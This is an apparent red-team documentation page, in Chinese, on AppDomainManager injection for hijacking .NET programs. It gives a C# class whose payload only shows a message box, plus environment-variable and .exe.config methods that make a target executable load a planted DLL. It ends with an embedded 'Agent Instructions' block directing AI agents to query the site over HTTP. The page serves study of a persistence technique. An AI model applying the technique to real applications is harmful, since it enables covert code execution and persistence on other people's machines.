# 劫持.NET程序

## 劫持.NET程序（AppDomainManager）

#### 首先制作要加载的恶意程序 <a href="#h3-u9996u5148u5236u4f5cu8981u52a0u8f7du7684u6076u610fu7a0bu5e8f" id="h3-u9996u5148u5236u4f5cu8981u52a0u8f7du7684u6076u610fu7a0bu5e8f"></a>

C#：

```csharp
using System;
using System.Windows.Forms;
public sealed class MyAppDomainManager : AppDomainManager
{
    public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
    {
        MessageBox.Show("AppDomainManager Injection");
        return;
    }
}
```

之后将其编译为qwqdanchun.dll。

#### 注入方法一： <a href="#h3" id="h3"></a>

命令行设置环境变量：

```
set APPDOMAIN_MANAGER_ASM=qwqdanchun, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
set APPDOMAIN_MANAGER_TYPE=MyAppDomainManager
```

之后将qwqdanchun.dll与.net文件放在同一目录即可。

#### 注入方法二： <a href="#h3" id="h3"></a>

寻找要注入的exe文件（此处示例使用qwqdanchun.exe），并将做好的dll与其置于同一目录，再将如下配置文件写入qwqdanchun.exe.config文件即可。

```markup
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/>
  </startup>
    <runtime>
      <appDomainManagerAssembly value="qwqdanchun, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
      <appDomainManagerType value="MyAppDomainManager" />
    </runtime>
</configuration>
```

参考文章：

{% embed url="<https://web.archive.org/web/20170919060201/http://subt0x10.blogspot.com/2017/06/attacking-clr-appdomainmanager-injection.html>" %}

{% embed url="<https://pentestlaboratories.com/tag/appdomainmanager-injection/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.qwqdanchun.com/persistence/dll-hijack/hijack-.net-program.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.